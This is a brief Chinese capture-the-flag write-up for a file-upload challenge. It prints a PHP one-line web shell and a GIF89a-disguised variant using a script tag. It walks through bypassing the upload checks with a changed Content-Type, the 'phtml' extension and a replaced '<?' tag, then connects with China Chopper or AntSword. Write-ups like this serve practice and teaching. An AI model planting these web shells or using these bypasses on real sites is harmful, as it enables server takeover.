题目打开是一个文件上次功能点
首次常规操作二话不说先上传一个一句话木马。
<?php @eval($_POST['123'])?>
页面提示被拦截,并显示not image
那我们进行抓包修改Content-Type字段进行绕过
发现php后缀被拦截,所以我们用畸形的后缀在进行绕过。
phtml、pht、php、php3、php4、php5
发现phtml可以正常绕过
发现<?被检测出来,进行拦截了,所以我们需要替换我们的一句话木马。
GIF89a? <script language="php">eval($_REQUEST[123])</script> #替换之后的木马
然后就上次成功了
访问upload目录
http://575fd4ff-f4b4-4bf4-ab40-b71548f7b2f9.node4.buuoj.cn/upload/
然后用菜刀、蚁剑链接,链接地址
http://575fd4ff-f4b4-4bf4-ab40-b71548f7b2f9.node4.buuoj.cn/upload/shell.phtml
在根目录下找到flag
